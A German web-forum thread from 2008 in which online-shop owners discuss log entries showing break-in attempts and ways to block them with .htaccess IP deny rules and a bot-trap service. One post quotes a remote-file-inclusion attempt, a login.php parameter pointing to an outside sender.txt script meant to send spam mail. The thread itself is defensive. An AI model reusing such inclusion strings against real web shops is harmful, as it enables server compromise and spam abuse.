kindspech Posted May 13, 2008 Report Share Posted May 13, 2008 Heute war ein seltsamer Gast online: IP-Adresse koreanisch Referer URL: /login.php?XTCsid=http://www.zoo-metelen.de/sender.txt?&server=www.kindspech.de/login.php?XTCsid=&[email protected] Was heisst denn das? hat der Zoo Metelen einen Newsletter verschickt? die Google-Mailadresse hab ich ge-xxx-t, da steht eine richtige drin... Viele Grüße Natascha Link to comment Share on other sites More sharing options...
rivendarkness Posted May 13, 2008 Report Share Posted May 13, 2008 ja, klingt nach einem einbruchsversuch Link to comment Share on other sites More sharing options...
kindspech Posted May 13, 2008 Author Report Share Posted May 13, 2008 später war noch ein ähnlicher Gast online, gleiche Emailadresse in der Referer URL, aber andere Website (www.biomed.ua/) besoners das "to" vor der Emailadresse macht mich stutzig... kann denn nun was passieren??? Link to comment Share on other sites More sharing options...
rivendarkness Posted May 13, 2008 Report Share Posted May 13, 2008 nein, soweit ich weiß ist der shop so ziemlich sicher und bietet wenig angriffsfläche Link to comment Share on other sites More sharing options...
Guest tuvalu Posted May 13, 2008 Report Share Posted May 13, 2008 Die Datei http://www.zoo-metelen.de/sender.txt existiert nicht. Habe das auch im Shop. Das letzte mal kam die IP aus China. Habe sie gesperrt. Hast Du überprüft welche IP das bei Dir war? My2Cent tuvalu Link to comment Share on other sites More sharing options...
kindspech Posted May 13, 2008 Author Report Share Posted May 13, 2008 hab beide Male einen Screenshot gemacht... waren aber unterschiedliche IPs. die Frage ist, ob das Sperren der IPs was bringt, denn das nächste Mal ist es vielleicht wieder eine andere... wie funktioniert das Sperren eigentlich?? Link to comment Share on other sites More sharing options...
Guest tuvalu Posted May 13, 2008 Report Share Posted May 13, 2008 wie funktioniert das Sperren eigentlich?? An die .htaccess im root-Verzeichnis des Shops folgendes anhängen: deny from 61.142.80.108My2Cent tuvalu Link to comment Share on other sites More sharing options...
kindspech Posted May 13, 2008 Author Report Share Posted May 13, 2008 hey danke!!!! Link to comment Share on other sites More sharing options...
kindspech Posted May 14, 2008 Author Report Share Posted May 14, 2008 genau die IP Adresse hatte ich nun auch zweimal online, ich kann dir noch diese anbieten: 211.233.68.233 - das ist die aus Korea.. Also Leutes, sperrt die beiden IPs! HIer sind Hacker unterwegs! :eek: Link to comment Share on other sites More sharing options...
Vio Posted May 14, 2008 Report Share Posted May 14, 2008 Hallo Natascha , hast Du Dir mal bot-trap angesehen. Da sind die meisten dieser IP´s schon gesperrt. Findest Du in Deinem Shop eine neue, meldest Du die an bot-trap und bei allen, die bot-trap nutzen,bleibt der Spammer draußen. Grüße Vio Link to comment Share on other sites More sharing options...
kindspech Posted May 14, 2008 Author Report Share Posted May 14, 2008 Hi Vio! War das nicht die Geschichte, wo man sich im Forum vorstellen muss usw. ??? Ich denke aber, ich könnte das wirklich mal in Angriff nehmen.. Ich finde es nicht gerade lustig, Hacker in meinem Shop bzw. vor der Shoptüre zu haben.. Viele Grüße Natascha Link to comment Share on other sites More sharing options...
Vio Posted May 14, 2008 Report Share Posted May 14, 2008 Hi Vio! War das nicht die Geschichte, wo man sich im Forum vorstellen muss usw. ??? Viele Grüße Natascha Stimmt, tut aber nicht weh und ist auch kein öffentlicher Bereich;) Grüße Vio Link to comment Share on other sites More sharing options...
Guest tuvalu Posted May 14, 2008 Report Share Posted May 14, 2008 hast Du Dir mal bot-trap angesehen. Da sind die meisten dieser IP´s schon gesperrt. Findest Du in Deinem Shop eine neue, meldest Du die an bot-trap und bei allen, die bot-trap nutzen,bleibt der Spammer draußen. Das gilt nur für Bots, nicht für Menschen. Menschen können die Sperre umgehen. Außerdem - und das ist bei Bot-Trap systembedingt - wird eine Sperr-IP-Liste von jemand anderem geführt, es hat also jemand anderer Gewalt über den Zugang zu meinem Shop - und mit dem habe ich nicht mal einen rechtsgültigen Vertrag. Sind die also der Meinung, die Telekom sei böse, warum auch immer, vielleicht weil sie Aktien von denen haben und die sind wieder mal gefallen, und sperren den Zugang, merkt man das höchstens an der geringeren Zahl der Bestellungen. Nicht, dass ich Bot-Trap etwas böses unterstellen will. Gab es aber schon alles mal. My2Cent tuvalu Link to comment Share on other sites More sharing options...
kindspech Posted May 14, 2008 Author Report Share Posted May 14, 2008 bei mir im Shop gehts ab!!! nun kommt einer mit dieser Seite daher: http://www.inferno-online.kit.net/hot da steckt ein Skript hinter.. Stichworte "Mass Mail". ich vermute, da will mir einer ein Skript unterjubeln, damit ich Spam vom Server verschicke... Link to comment Share on other sites More sharing options...
Vio Posted May 14, 2008 Report Share Posted May 14, 2008 Das gilt nur für Bots, nicht für Menschen. Menschen können die Sperre umgehen. Außerdem - und das ist bei Bot-Trap systembedingt - wird eine Sperr-IP-Liste von jemand anderem geführt, es hat also jemand anderer Gewalt über den Zugang zu meinem Shop - und mit dem habe ich nicht mal einen rechtsgültigen Vertrag. Sind die also der Meinung, die Telekom sei böse, warum auch immer, vielleicht weil sie Aktien von denen haben und die sind wieder mal gefallen, und sperren den Zugang, merkt man das höchstens an der geringeren Zahl der Bestellungen. Nicht, dass ich Bot-Trap etwas böses unterstellen will. Gab es aber schon alles mal. My2Cent tuvalu Therotisch ist das vielleicht möglich, habe aber bisher keine Klagen über bot-trap gehört. Wo gab es das schon mal? Außerdem kann das script auch manuell eingepflegt werden, so dass kein Zugriff von außen möglich sein soll (http://www.bot-trap.de/home/pages/faq.php) Sicherlich sollte sich jeder vorher genau informieren und dann abwägen. Grüße Vio Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.